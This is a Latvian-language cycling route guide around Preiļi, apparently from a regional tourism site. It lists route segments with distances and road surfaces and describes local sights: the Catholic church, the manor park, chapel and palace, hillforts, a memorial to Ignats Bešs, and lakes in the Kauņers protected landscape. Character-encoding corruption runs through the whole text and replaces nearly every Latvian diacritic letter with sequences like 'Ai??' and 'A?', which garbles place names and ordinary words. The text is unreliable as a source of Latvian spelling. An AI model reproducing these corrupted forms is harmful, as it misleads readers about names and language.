ApkA?rt PreiA?iem | Dēkaiņi

ApkA?rt PreiA?iem


ApkA?rt PreiA?iem Print This Post

DabA? marA?rutam ir sarkans marAi??Ai??jums

PiedA?vA?tA? velomarA?ruta priekA?rocAi??ba ir tA?da, ka neviens no marA?ruta punktiem nav tA?lA?k kA? 13 km no PreiA?u centra. Tas nozAi??mAi??, ja velobraucAi??ju marA?rutA? ir pA?rsteiguA?i nepatAi??kami laika apstA?kA?i, raduA?A?s tehniskas problAi??mas, sastreikojusies veselAi??ba vai vienkA?rA?i bAi??rni sA?kuA?i niAi??oties, tad pa tuvA?ko ceA?u lAi??dz PreiA?u centram nebAi??s vairA?k par 13 km. Sazarotais ceA?u tAi??kls, kas ieskauj PreiA?us, braucAi??jiem A?auj izvAi??lAi??ties sev tAi??kamu marA?ruta posmu un tA? garumu, ar iespAi??ju pa tuvA?ko ceA?u A?tri atgriezties PreiA?os.

PreiA?i-Saltupes iela-Jaunsaimnieki-Plivdas-Anspoki- 5,1km

Anspoki-Litavnieki-KankuA?i-Ludvigova-GailAi??A?i (GaiA?muiA?a)- 12,2km

GailAi??A?i (GaiA?muiA?a)-Ai??Ai??itkina-TiA?a-GailAi??A?i (GaiA?muiA?a)- 7,1km

GailAi??A?i (GaiA?muiA?a)-PAi??zA?ni-KozuA?i-Novini-Lielais Ostrovas ez.-9,7km

Lielais Ostrovas ez.-Novini-SkangeA?i-RiebiAi??i-RiebiAi??u muiA?a (estrA?de)-7,9km

RiebiAi??u muiA?a (estrA?de)-Stefanapole-Medvednieki-PieniAi??i-7,6km

PieniAi??i-Kalnacki-KokorieA?i-Moskvina- 10,6km

Moskvina-Ai??Ai??ilteri-Vaivodi-PreiA?i-10,3km

KOPAi??-70,5km

MarA?rutA? asfalta segums ir 11,7 km ceA?a, grants segums 30,3 km, uzlabots zemes ceA?A? 17,3 km, zemesceA?A? 7.0 km, grAi??ti izbraucams zemesceA?A? 4,2 km. Ar grAi??ti izbraucamu zemesceA?u jA?saprot, ka to grAi??ti ir izbraukt ar automaA?Ai??nA?m, bet ar velosipAi??diem tas nesagA?dA?s problAi??mas. PA?rsvarA? A?ie ceA?i ir pA?avA?s un ganAi??bA?s iebrauktas divas sliedes vai taciAi??as. Reljefs pA?rsvarA? lAi??dzens. VairA?k kA?pumu un nobraucienu ir marA?ruta posmA? no PreiA?iem lAi??dz RiebiAi??iem. LietainA? laikA? vai pAi??c lietavA?m zemes ceA?i un grAi??ti izbraucamie zemes ceA?i, pateicoties Latgales mA?lam, vietA?m var bAi??t dubA?aini un slideni. SavukA?rt sausA? laikA? uz grantAi??tajiem lielceA?iem veidojas ai??ztrepeai??? – seviA?Ai??i posmA? PieniAi??i – Moskvina un Ai??Ai??ilteri – PreiA?i. CilvAi??ki, kuriem nav sveA?as regulA?ras fiziskA?s aktivitA?tes, A?o marA?rutu veiks vienas dienas laikA?. PA?rAi??jie var izvAi??lAi??ties veikt daA?u no marA?ruta atbilstoA?i savA?m fiziskajA?m spAi??jA?m. IepirkA?anA?s jA?plA?no PreiA?os, GailAi??A?os (GaiA?muiA?A?), RiebiAi??os vai PieniAi??os. IespAi??jas baudAi??t sabiedriskA?s Ai??dinA?A?anas pakalpojumus ir PreiA?os un RiebiAi??os. RiebiAi??os tikai darba dienA?s no 8 00-17 00.

 

LabA?kA?s peldvietas ir PreiA?u parka peldvietA?, aktAi??vA?s atpAi??tas zonA?, KauA?era ezerA? pie dA?rzkopAi??bas sabiedrAi??bas ai??zKauA?ersai???, Salmeja ezerA?, LielajA? Ostrovas ezerA? un PieniAi??u ezerA?.

MarA?rutA? kilometru atskaite sA?kas no PreiA?u centra pie Romas katoA?u draudzes baznAi??cas, kas ir viens no skaistA?kajiem arhitektAi??ras pieminekA?iem pilsAi??tA?. PirmA? baznAi??ca PreiA?os tika uzbAi??vAi??ta 1676. gadA? (pAi??c citiem datiem jau 1580. gadA?). TA? bija neliela koka celtne, ko uzcAi??la par muiA?kunga Borha lAi??dzekA?iem. Dievnamu aprAi??pAi??ja jezuAi??ti, kas PreiA?os veica darbAi??bu lAi??dz 1775. gadam. TagadAi??jA? baznAi??ca celta laikA? no 1866. – 1878. g. pAi??c arhitekta Visocka projekta vecA?s koka baznAi??cas vietA?. 1896. gada 27. jAi??nijA? baznAi??cu iesvAi??tAi??ja. BaznAi??ca ir ar vienu lielu torni. Ai??ajA? tornAi?? ir 3 zvani – “SvAi??tais PAi??teris” (lielais), “SvAi??tais Francisks” (vidAi??jais) un “SvAi??tA? TerAi??ze” (mazais). Te apskatA?ma gleznas ai??zDievmA?te altA?rAi??ai???, ai??zSvAi??tais Antonsai???, virs lielA? altA?ra atrodas sudraba plA?ksne ai??zJaunavas Marijas bezvainAi??gA? ieAi??emA?anaai???, kuras izcelsme datAi??ta ar 1842. gadu. IevAi??rAi??bas cienAi??gs ir arAi?? 18. gadsimta krucifikss un 19. gadsimta ciborija kauss. SakrA?lA?s celtnes simtS gadu jubilejA? baznAi??cas dA?rzA? uzstA?dAi??ta Latgales MA?tes statuja (tAi??lnieks B. Buls). 1993. gada 22. augustA? pie baznAi??cas tika atklA?ts tAi??lnieces Vijas Dzintares piemineklis SAi??rojoA?A? MA?te. Ai??is ir veltAi??jums nacionA?lajiem partizA?niem, kuri ar ieroA?iem rokA?s cAi??nAi??jA?s pret mierAi??go iedzAi??votA?ju deportA?cijA?m uz SibAi??riju, pret Molotova – RAi??bentropa pakta sekA?m, pret sveA?u varu varmA?cAi??bu. ViAi??i tika nogalinA?ti drAi??z pAi??c krievu armijas ienA?kA?anas novadA?, kaili nomesti A?ajA? vietA? par brAi??dinA?jumu citiem.

Ai??is piemineklis atgA?dina arAi?? to daudzo represAi??to A?ausmas un pA?rdzAi??vojumus, kuri pa nakts melnumu tika izvesti no mA?jA?m, atraujot mA?tAi??m bAi??rnus un bAi??rniem mA?tes, lai dzAi??tu uz dzelzceA?a stacijA?m un no turienes lopu vagonos aizvestu pretAi?? iznAi??cAi??bai. NeizmAi??rojamas bijuA?as tautas cieA?anas, par tA?m atgA?dina sAi??rojoA?A?, ceA?os noslAi??gusAi?? baltA? akmens mA?te, ar segu uz labA?s rokas – to viAi??a klA?j uz nezinA?mA?s vietA?s palikuA?ajiem mAi??su tautas dAi??liem un meitA?m.

30. gados A?ajA? vietA? atradA?s postaments par godu Krievijas caram Aleksandram II, kurA? 1861. g. LatgalAi?? atcAi??la dzimtbAi??A?anu.

 

 

PAi??c baznAi??cas apskates pa RaiAi??a bulvA?ri dodamies uz parka pusi. BulvA?ra galA? redzams neoficiA?lais PreiA?u simbols – sarkanu Ai??ieA?eA?u parka vA?rti. Tie atrodas pretAi?? katoA?u baznAi??cas vA?rtiem otrA? bulvA?ra galA?. Blakus vA?rtiem ir 19. gs. celtais pils vA?rtu sarga namiAi??A?. PaA?reiz A?eit atrodas PreiA?u VAi??stures un lietiA?Ai??A?s mA?kslas muzeja etnogrA?fijas priekA?metu, tekstiliju, keramikas un mAi??beA?u krA?tuve.

 

 

 

 

 

Uzreiz aiz vA?rtiem ir apskatA?ma 1817. gadA? uzceltA? PreiA?u MuiA?as kapela. Ai??ajA? kapelA? katru dienu notika dievkalpojumi, un grA?fs Ai??paA?i A?im nolAi??kam uzturAi??ja muiA?as garAi??dznieku. Zem kapelas bija iekA?rtotas kapenes grA?fa A?imenes locekA?u apbedAi??A?anai. Kapelas arhitektAi??ra atbalso Romas Panteona ideju – tA? celta no neaptAi??stiem laukakmeAi??iem rotondas veidA?. Kapelas portA?lu, ko noslAi??dz trAi??sstAi??ra frontons, balsta izbAi??dAi??tas A?etras apaA?as kolonas. 1918. gada 4. decembrAi?? PreiA?os iebruka Padomju Krievijas sarkanA? armija un nodibinA?ja padomju varu, faktiski komunistu diktatAi??ru. 1919. gada vasarA? komunisti apgA?nAi??ja un izdemolAi??ja kapelu. No tA?s izsvieda kapelas iekA?rtu un te ierAi??koja klubu ai??zBliA?e k svetuai??? (ai??zTuvA?k gaismaiai???), tA?ds uzraksts tika uzkrA?sots arAi?? uz kapelas fasA?des. Tika atlauztas un izpostAi??tas arAi?? grA?fu Borhu kapenes kapelas pagrabstA?vA?. 20. gadsimta 20. gados kapelu nodeva baznAi??cas rAi??cAi??bA?. TajA? tika atjaunots altA?ris un notika dievkalpojumi. PAi??c OtrA? pasaules kara Ai??ka tika vAi??lreiz izdemolAi??ta un vairs netika izmantota. 1995. gadA? PreiA?u Romas katoA?u baznAi??ca atjaunoja Ai??paA?umtiesAi??bas uz kapelu un kopA? tA? brAi??A?a rAi??pAi??jas par tA?s uzturAi??A?anu. 2006. gadA? kapelu pilnAi??bA? restaurAi??ja, pateicoties Valsts KultAi??rkapitA?la fondam, Eduarda Upenieka iniciatAi??vai un privA?tajiem ziedojumiem.

Aiz vA?rtiem arAi?? sA?kas PreiA?u parks. 18.-19. gs. veidotais 41 ha (pAi??c citiem datiem 43 ha) plaA?ais regulA?ra plA?nojuma muiA?as parks ir viens no ievAi??rojamA?kajiem ainavu parkiem LatvijA?. ParkA? izveidota sareA?A?Ai??ta dAi??Ai??u un kanA?lu sistAi??ma ar salA?m, vairA?k nekA? 25 koku un krAi??mu sugu stA?dAi??jumu grupA?m, tostarp IR arAi?? vairA?ki diA?koki. IespAi??jams, ka PreiA?u parka plA?nojumu projektAi??jis itA?A?u arhitekts VinA?ento Macoti (1756-1798). ParkA? atrodas vairA?kas PreiA?u muiA?as kompleksam piederAi??gas bAi??ves – PreiA?u pils, staA?A?i, trAi??s vA?rti, minAi??tA? kapela un vA?rtu sarga namiAi??A?.

Aiz vA?rtiem un kapelas tA?lA?k dodamies pa bruA?Ai??tu taciAi??u lAi??dz tiltiAi??am. LabajA? pusAi?? ir redzamas zirgu staA?A?a drupas. Zirgu stallis sastA?v no trim kopA? savienotiem korpusiem. StaA?A?a izveidei un dekorA?cijai izmantoti pA?rsvarA? neogotikas elementi – piemAi??ram, stAi??ru torAi??i. Ai??kas romantisko noskaAi??u izceA? zirgu galvas arhivoltu centrA? un logailu ierA?mAi??jums. FasA?A?u apdarAi?? izmantots laukakmeAi??u mAi??ris ar sAi??ku A?Ai??embu iespiedumiem javA? un gluda apmetuma virsma.

TA?lA?k, aiz staA?A?iem, ir redzama PreiA?u aktAi??vA?s atpAi??tas zona. Te ir pilsAi??tas peldvieta, pirmA? BMX trase LatgalAi??, pludmales volejbola un futbola laukumi.

 

 

Turpinot marA?rutu, kreisajA? pusAi?? redzam PreiA?u muiA?as kalpu mA?ju, bet vAi??l pAi??c apmAi??ram 200 m nonA?kam pie PreiA?u pils. PreiA?u pils ir izcils Latgales 19. gs. historisma laika muiA?u arhitektAi??ras paraugs, kas izteiksmAi??gi raksturo romantisma periodu Latvijas muiA?u mA?kslas un sabiedriskajA? dzAi??vAi??. Viduslaikos PreiA?u novads ar pili piederAi??ja Livonijas ordenim, bet kopA? 1382. gada ai??i?? barona fon Borha dzimtai. TA?s pA?rstA?vAi??tais arhitektAi??ras stils ir neogotika. SA?kotnAi??ji PreiA?os atradusies Livonijas ordeAi??a pils, kas, iespAi??jams, celta 14. gs. pAi??dAi??jA? ceturksnAi??. Ai??Ai?? pils pastA?vAi??ja lAi??dz 16. gs. vidum, tad, Livonijas kara laikA?, Krievijas armija pili nopostAi??ja. Borhi nopostAi??to Ai??ku neatjaunoja, bet uzcAi??la jaunu pili, kas nodega 18. gs. sA?kumA?. TA?s vietA? tika celta treA?A? – divstA?vu Ai??ka. Ai??kai novecojot, bAi??vAi??ta jauna, ceturtA?, PreiA?u pils. Ceturto PreiA?u pili sA?ka bAi??vAi??t 19. gs. sA?kumA? pAi??c arhitektu Gustava Ai??ahta un A. Belecka projekta angA?u neogotikas stilA?. TA? savu galAi??go veidolu ieguva laikA? no 1860. – 1865. gadam. ReizAi?? ar pils celtniecAi??bu Borhi pA?rveidoja veco parku, ievAi??rojami paplaA?inot tA? robeA?as. Tika uzbAi??vAi??tas arAi?? jaunas saimniecAi??bas Ai??kas. 1979. gada (?) februA?rAi?? pils izdega un pAi??c tam vairA?kus gadus stA?vAi??ja bez jumta. 1985. gadA? sA?kA?s remontdarbi, vAi??lA?k Ai??kai uzlikts arAi?? jumts, bet turpmA?kie atjaunoA?anas darbi pA?rtraukti.

Aiz PreiA?u pils marA?rutu turpinA?m pa taciAi??u un nonA?kam pie Mehanizatoru ielas, kuru A?Ai??Ai??rsojam. TA?lA?k dodamies garA?m LauksaimniecAi??bas atbalsta dienesta Ai??kai un bAi??rnudA?rzam, lAi??dz nonA?kam uz neasfaltAi??tas ielas – tA? ir Saltupes iela, pa kuru turpinA?m marA?rutu taisni. PAi??c 400 m esam sasnieguA?i Saltupes ielas mikrorajonu. Pa labi redzami AS ai???PreiA?u siersai??? raA?oA?anas korpusi.

A/s ai??zPreiA?u siersai??? ir lielA?kais PreiA?u uzAi??Ai??mums, lielA?kais PreiA?u novada nodokA?u maksA?tA?js un lielA?kais siera raA?otA?js un eksportAi??tA?js LatvijA?.
Piena pA?rstrA?des uzAi??Ai??mums PreiA?os ir dibinA?ts 1972. gadA? kA? valsts uzAi??Ai??mums ai??zPreiA?u siera rAi??pnAi??caai???. 1994. gadA? uzAi??Ai??mums tika reorganizAi??ts par akciju sabiedrAi??bu ai??zPreiA?u siersai???.

Aiz Saltupes ielas mikrorajona marA?rutu turpinA?m pa bezseguma ceA?u garA?m lauku mA?jA?m. PAi??c 600 m metriem nonA?kam pie krustojuma; mums jA?turas pa kreisi, un drAi??z labajA? pusAi?? ir nA?koA?A? lauku sAi??ta. Aiz tA?s ceA?A? ievijas meA?A?, A?Ai??Ai??rso gA?zes vada trasi, un pAi??c 350 m nonA?kam pie kA?rtAi??jA?s lauku sAi??tas. PAi??c neliela nobrauciena kreisajA? pusAi?? redzams meA?a ieskauts paugurs ar bAi??rziem virsotnAi?? un izteiksmAi??gu nogA?zi – tas ir Plivdu (Pliudu) pilskalns.

Plivdu (Pliudu) pilskalnu no trijA?m pusAi??m ieskauj PreiA?upes lAi??kums. TA? relatAi??vais augstums ir 17 m. UzkA?pjot pilskalna virsotnAi?? var apskatAi??t A?oti stA?vo Z nogA?zi – te var pA?rliecinA?ties, ka ienaidniekam nebija viegli A?o pilskalnu iekarot un ka senie latgaA?i prata izvAi??lAi??ties vietas, kur celt savas pilis un apmetnes! Ai??o pilskalnu atklA?ja un 1928. gadA? savA? grA?matA? ai???Latvijas pilskalniai??? aprakstAi??ja Ernests BrastiAi??A?. ViAi??A? raksta: ai???Ai??is kalns tagad tiek arts, bija apsAi??ts rudziem, bet senA?k, domA?jams, bijis nocietinA?ts ierakumiem un uzbAi??rumiem. No tiem nav vairs atlicis nekA?du pAi??du, jo arA?ana iesA?kta pirms 50 gadiem un plakums kA? arAi?? sA?ni jau pA?rveidoti.ai??? MAi??sdienA?s te vairs arA?ana nenotiek un tikai D nogA?ze tiek izmantota ganAi??bA?m.

TurpinA?m marA?rutu lAi??dz nonA?kam lAi??dz ceA?am Anspoki – Ai??tolderis, kur nogrieA?amies pa kreisi un braucam lAi??dz Anspokiem vai PreiA?i – Aglona A?osejai. No marA?ruta sA?kuma esam veikuA?i 5,1 km.

 

Ai??eit ir apskatA?ma bijuA?A?s Anspoku (Anspaku) muiA?as apbAi??ve, kas ir vietAi??jA?s nozAi??mes arhitektAi??ras piemineklis. KA? pirmo kreisajA? pusAi?? redzam 20. gs. 30. gados celto klAi??ti, blakus atrodas 19. gs. otrajA? pusAi?? celtais krogs, bet tA?lA?k pussagruvuA?A? Ai??ka ir 19. gs. pirmajA? pusAi?? celtais stallis. Pa labi redzama 20. gs. 30. gados celtA? dzAi??vojamA? Ai??ka, kur kA?dreiz bija sakaru nodaA?a.

SA?kas nobrauciens PreiA?upes ielejA?. Pirms tilta pA?r PreiA?upi pa labi ir celiAi??A? uz lauku sAi??tu, aiz kuras atrodas un ir apskatA?mas Anspoku muiA?as medAi??bu pils drupas un Anspoku (Anspaku) pilskalns.

 

 

Anspoku (Anspaku) pilskalnu 1977. gadA? apzinA?ja arheologs Juris UrtA?ns. Pilskalns ierAi??kots 10 m augstA? zemes ragA?, kuru no trim pusAi??m apAi??em PreiA?upAi??te, bet no ceturtA?s puses tas norobeA?ots ar diviem nelieliem vaA?Ai??iem un grA?vjiem. Pirmais valnis ir 0,7 m augsts, 31 m garA?, starp to un otro valni ir 0,8 m dziA?A? grA?vis. Otrais valnis ir 0,25 m augsts; otrA? grA?vja dziA?ums – 0,25 m. Pilskalna plakums ir trAi??sstAi??rveidAi??gs, tA? garums – 37 m, platums gar valni – 32 m. Plakums ir izlAi??dzinA?ts, ar divu metru kritumu ZR virzienA?. Kalna nogA?zes R, ZA un DA pusAi?? nobrukuA?as PreiA?upAi??tAi??. Anspoku pilskalns bija vAi??lA? dzelzs laikmeta nocietinA?jums.

Anspoku (Anspaku) un Plivdu (Pliudu) pilskalnu nozAi??me un vAi??sture ir cieA?i saistAi??ta. LatvijA? zinA?mi vairA?ki A?A?du pilskalnu pA?ri. Uzskata, ka A?audis sA?kumA? apdzAi??vojuA?i mazA?ko, vA?jA?k nocietinA?to pilskalnu. Ai??ajA? gadAi??jumA? tas bija Anspoku (Anspaku) pilskalns. VAi??lA?k, pieaugot cilvAi??ku skaitam un mainoties ekonomiskA?s un politiskA?s dzAi??ves apstA?kA?iem galvenA? nocietinA?juma funkcijas pA?riet uz kA?du citu netA?lu esoA?u, lielA?ku kalnu. Ai??ajA? gadAi??jumA? – uz Plivdu pilskalnu.

Anspoku (Anspaku) medAi??bu pils celta 19. gs. vidAi??. LaikA? no 19. gs. sA?kuma lAi??dz 60. gadiem PreiA?u muiA?A? notika lieli celtniecAi??bas un labiekA?rtoA?anas darbi. Tos uzsA?ka grA?fs Jozefs Heinrihs Borhs, bet pabeidza viAi??a dAi??ls Mihaels Borhs – pAi??dAi??jais PreiA?u Ai??paA?nieks. Ai??ajA? laikA? tika uzcelta grA?fu Borhu kapela, PreiA?u jaunA? pils un jaunas saimniecAi??bas Ai??kas. ReizAi?? ar pils celtniecAi??bu Borhi pA?rveidoja veco parku, ievAi??rojami paplaA?inot tA? robeA?as. Ai??ajA? laikA? arAi?? tika uzcelta medAi??bu pils, no kuras mAi??sdienA?s palikuA?as tikai drupas. Tautas nostA?sti stA?sta, ka PreiA?u jauno pili un medAi??bu pili savieno slepena pazemes eja, kuru gan neviens nav atradis.

ApskatAi??juA?i medAi??bu pili, dodamies PreiA?u virzienA?. Ja ir interese, var nokA?pt PreiA?upes ielejA? un no upes apskatAi??t tiltu pA?r PreiA?upi. Tas, izrA?dA?s, ir arkveida tilts, kas bAi??vAi??ts no kaltiem laukakmeAi??iem un kura virsma ir nobetonAi??ta un pAi??c tam noasfaltAi??ta. No augA?as tilts izskatA?s kA? parasts, padomju laikos celts tilts. No tilta turpinA?m ceA?u un pAi??c 1,3 km nonA?kam pie lauku ceA?a ar norA?di uz Ignata BeA?a piemiAi??as vietu. Ai??eit nogrieA?amies pa labi un turpinA?m braukt lAi??dz sasniedzam minAi??to piemiAi??as vietu. No marA?ruta sA?kuma esam veikuA?i 8,0 km.

Ignats BeA?s ir I pasaules kara un Latvijas BrAi??vAi??bas cAi??Ai??u dalAi??bnieks, robeA?sargs, policijas darbinieks, apakA?pulkvedis, divu Jura krustu, StaAi??islava, LA?A?plAi??A?a Kara un TrAi??s ZvaigA?Ai??u ordeAi??a kavalieris. Dzimis 1890. gada 14. februA?rAi?? PreiA?u pagasta Litavniekos trAi??cAi??gu zemnieku JA?zepa un Elizabetes seA?u bAi??rnu A?imenAi?? ai??i?? visi dAi??li, no kuriem trAi??s kA?uva par karavAi??riem. 1918. gada 15. decembrAi?? brAi??vprA?tAi??gi iestA?jies Latvijas armijas pirmajA? kaujas vienAi??bA? – pulkveA?a Oskara Kalpaka bataljonA?. 1919. gada 30. septembrAi?? I. BeA?u paaugstinA?ja par kapteini un pA?rcAi??la par bataljona komandieri uz Latgales partizA?nu pulku, kurA? Kurzemes divAi??zijas sastA?vA? cAi??nAi??jA?s par Latgales atbrAi??voA?anu no Padomju Krievijas interventiem. 1920. Ai??gada janvA?ra ai??i?? februA?ra uzbrukumu rezultA?tA? Latvijas armija austrumos sasniedza latvieA?u tautas etnogrA?fiskA?s robeA?as. Latvija atguva arAi?? senu latvieA?u zemi ai??i?? Abrenes novadu. Ar seviA?Ai??u pacilA?tAi??bu A?ajA?s kaujA?s gA?ja visi Latvijas armijas cAi??nAi??tA?ji, bet jo seviA?Ai??i Latgales partizA?nu pulks un latgalieA?i, kas atradA?s citA?s karaspAi??ka vienAi??bA?s. 1920. gada 2. februA?rAi?? pie AugA?pils sava bataljona priekA?galA? zem stipras ienaidnieka apA?audes Ignats BeA?s ieAi??Ai??ma stipri nocietinA?to kalnu, ar loA?metAi??ju pirmais uzskrienot tajA? un atklA?jot uguni uz ienaidnieku. Pateicoties I. BeA?a personAi??gajai drosmei un prasmAi??gajai kaujas vadAi??bai, tika atsisti trAi??s ienaidnieka pretuzbrukumi un noturAi??ts stratAi??A?iski svarAi??gs aizsardzAi??bas punkts. LAi??dz 1936. gadam Ignats BeA?s ieAi??Ai??ma daA?A?dus amatus Latvijas robeA?u apsardzAi??. 1936. gadA? Ignatu BeA?u paaugstinA?ja apakA?pulkveA?a pakA?pAi?? un iecAi??la par Abrenes pilsAi??tas kA?rtAi??bas policijas iecirkAi??a priekA?nieku, bet 1939. gadA? pA?rcAi??la tA?dA? paA?A? amatA? uz PreiA?u pilsAi??tu. 1940. gada jAi??lija beigA?s A?ekisti viAi??u apcietinA?ja un, paAi??emot lAi??dzi viAi??a dokumentus, ordeAi??us un zobenu, aizveda uz Daugavpils cietumu. 1941. gada 14. jAi??nijA? Ignatu BeA?u deportAi??ja uz Krieviju, Krasnojarskas apgabalu, un 1943. gadA? gulaga nometnAi?? viAi??A? gA?ja bojA?. 1992. gada 11. novembrAi?? Litavniekos Ignatam BeA?am uzstA?dAi??ts un atklA?ts piemiAi??as akmens.

PAi??c piemiAi??as vietas apskates dodamies tA?lA?k. SA?kas neliels nobrauciens uz PreiA?upes ieleju, kuru arAi?? A?Ai??Ai??rsojam. ApmAi??ram pAi??c 2 km ceA?a segums mainA?s. Ja laika apstA?kA?i ir bijuA?i lietaini, tad segums vietA?m var bAi??t dubA?ains. ArAi?? marA?ruta reljefs ir kA?uvis viA?Ai??otA?ks – nobraucieni mijas ar lielA?kiem vai mazA?kiem kA?pumiem. PieveikuA?i apmAi??ram 700 m garu lAi??zenu kA?pumu, esam sasnieguA?i KankuA?u karjeru. Ai??Ai??Ai??rsojuA?i karjeru, nonA?kam aizsargA?jamA? ainavu apvidAi?? ai???KauA?ersai???.

AizsargA?jamA? ainavu apvidus ai???KauA?ersai??? platAi??ba ir 2762 ha, un tA? teritorijA? atrodas 7 ezeri: Salmeja, KauA?era, StupA?nu (Stuponu), Limanu, Meiraukas, Baibas un Asaru (EsereiA?a) ezeri, kuri no kopAi??jA?s aizsargA?jamo ainavu apvidus teritorijas platAi??bas sastA?da 8%. No tiem lielA?kie ir Salmeja, KauA?era un StupA?nu ezeri, kuri ir savstarpAi??ji savienoti ar meliorA?cijas gaitA? pA?rveidotu Ai??densteA?u sistAi??mu. AizsargA?jamA? teritorijA? sastopami 11 Eiropas un Latvijas nozAi??mes aizsargA?jamie biotopi, 15 aizsargA?jamA?s augu, dzAi??vnieku un sAi??Ai??u sugas, tostarp 6 Eiropas direktAi??vu sugas. AizsargA?jamajai sAi??nu sugai – platlapu vijzobei (Tortula latifolia) A?eit ir vienAi??gA? atradne LatvijA? un Baltijas valstAi??s. Nedaudzas atradnes LatvijA? ir arAi?? zA?A?u purvu sAi??nA?m apaA?lapu dumbrenei (Calliergon trifarium) un A?rijas merkijai (Moerckia hibernica). KonstatAi??ti seA?i EiropA? un LatvijA? aizsargA?jami pA?avu biotopi. TurpmA?kais marA?ruts lAi??dz GailAi??A?iem (GaiA?muiA?ai) un to apkA?rtni mAi??s vedAi??s cauri A?im aizsargA?jamo ainavu apvidum.

Aiz karjera pAi??c 1,15 km un patAi??kama nobrauciena sasniedzam Ludvigovas krustojumu. Labs orientieris ir krucifikss, kas atrodas ceA?a kreisajA? pusAi??. MarA?ruts paredz, ka mums jA?nogrieA?as pa kreisi, bet pirms tam varam nogriezties pa labi un pAi??c 50 m alkA?Ai??u meA?iAi??A? ceA?a kreisajA? pusAi?? apskatAi??t arheoloA?isko pieminekli – Ludvigovas senkapus II. No marA?ruta sA?kuma esam veikuA?i 13,8 km.

Ja ir interese, var pabraukt 600Ai??m uz priekA?u apskatAi??t Ludvigovas senkapus I vai Bogomolkas kalnu. Ai??ie senkapi nav apauguA?i ar kokiem, un, uzkA?pjot tajos, paveras skaista ainava uz StupA?nu ezeru. Ludvigovas senkapiem I un II ir liela arheoloA?iskA? vAi??rtAi??ba. Tie ir hronoloA?iski senA?kie apbedAi??jumi, un tiem ir raksturAi??gi akmens riAi??Ai??i un lAi??dzenie kapulauki, kuri tiek datAi??ti ar VIII gs.

KrustojumA? marA?rutu turpinA?m pa kreisi uz KauA?eru un GailAi??A?iem (GaiA?muiA?u). PAi??c 1,7 km esam sasnieguA?i dA?rzkopAi??bas sabiedrAi??bu ai???KauA?ersai???. Te, pa pirmo ceA?u pa labi, varam piebraukt pie skaistA? KauA?era ezera. Te arAi?? ir laba peldvieta.

KauA?era ezera platAi??ba ir 50,4 ha. TA? maksimA?lais dziA?ums sasniedz 21 m, bet vidAi??jais dziA?ums ir 6,1 m. KauA?ers ir maz aizaudzis ezers un lAi??dz ar to ir viens no dzidrA?kajiem eitrofajiem Latvijas ezeriem (caurredzamAi??ba 3,4 m pAi??c Sekki diska, 2006. gada novAi??rojumi). Ai??LatvijA? A?A?du ezeru nav daudz. Ezeram pieguA?oA?o teritoriju galvenokA?rt veido meA?i, tas ir ar meA?u noauguA?u pauguru ieskauts no Z, A, un D.

Turpinot no KauA?era lAi??dz GailAi??A?iem mAi??s sagaida kA?pums. NonA?kuA?i pie PreiA?u – KrA?ces A?osejas, mAi??s no marA?ruta sA?kuma esam veikuA?i 17,3 km.

GailAi??A?os (GaiA?muiA?A?) ir apskatA?ma muiA?as apbAi??ve un vietAi??jA?s nozAi??mes kultAi??rvAi??sturiskais piemineklis -Ai?? GailAi??A?u parks. GailAi??A?u parka platAi??ba ir 6,0 ha. TajA? ir sastopamas introducAi??to koku sugu, lapegA?u, audzes, kA? arAi?? saglabA?juA?A?s liepu rindas un lapegA?u grupas. No daA?A?m parka vietA?m paveras tA?li skati uz apkA?rtAi??jiem pauguriem un ezeru. ParkA? stA?dAi??tas vietAi??jA?s un eksotisko koku un krAi??mu sugas. No vietAi??jA?s sugA?m parkA? ir sastopamas liepas, kA?avas, ozoli, priedes, egles, pAi??lA?dA?i, lazdas un ievas. ParkA? ir bijuA?as vairA?k nekA? 120 sveA?zemju sugas.Ai?? MAi??sdienA?s parks ir nekopts, aizaudzis, tajA? sabAi??vAi??tas saimniecAi??bas Ai??kas.

GailAi??A?u (GaiA?muiA?as) apbAi??ves kompleksA? ietilpst 5 Ai??kas. SaglabA?jusies arAi?? kungu mA?ja, kur lAi??dz 2009. gada augusta beigA?m atradA?s pamatskola, bet paA?laik te ir sociA?lA?s aprAi??pes centrs. CeA?a pretAi??jA? pusAi?? ir GailAi??A?u kultAi??ras nams, piemineklis OtrajA? pasaules karA? krituA?ajiem padomju karavAi??riem, GailAi??A?u bibliotAi??ka un vAi??l daA?as Ai??kas.

Uz A?osejas grieA?amies pa labi. Te mAi??s sagaida skaists nobrauciens. Braucam 1,16 km lAi??dz pirmajam lielA?kajam ceA?am un nogrieA?amies pa kreisi. TA?lA?k turpinA?m pa labu grants ceA?u. ApmAi??ram pAi??c 800 m ceA?A? cieA?i pietuvojas Salmeja ezera krastam. Te ir vietAi??jo iedzAi??votA?ju atpAi??tas vieta, kur var piestA?t papriecA?ties par skaistajA?m ainavA?m un nopeldAi??ties.

 

 

FizA?eogrA?fiski Salmeja ezers atrodas Latgales augstienes FeimaAi??u paugurainAi??. TA? platAi??ba bez salA?m ir 99 ha, bet ar salA?m 100,2 ha. EzerA? atrodas A?etras salas. TA? vidAi??jais dziA?ums ir 2,8 m, bet maksimA?lais sasniedz 5,1 m. D-Z virzienA? Salmeja garums sasniedz 1,7 km, bet lielA?kais platums – 0,8 km.

TurpinA?m marA?rutu Z virzienA?. PAi??c 1,4 km nonA?kam T veida krustojumA?. Mums jA?dodas pa kreisi. PAi??c 450 m labajA? pusAi?? ir apskatA?mi TiA?as vecticAi??bnieku kapi, bet vAi??l pAi??c 300 m kreisajA? pusAi?? kA?Ai??st redzams Salmeja ezera Z gals. TurpinA?m braucienu vAi??l apmAi??ram 300 m, lAi??dz nonA?kam lAi??dz ceA?a krustojumam, kur mums jA?nogrieA?as pa kreisi. Brauciens jA?turpina lAi??dz ieraudzAi??sim TiA?as (TiA?inas) vecticAi??bnieku lAi??gA?anu nama sarkano jumtu un dzeltenos kupolus. Dodamies tuvA?k apskatAi??t nelielo dievnamu. No marA?ruta sA?kuma esam veikuA?i 22,4 km.

 

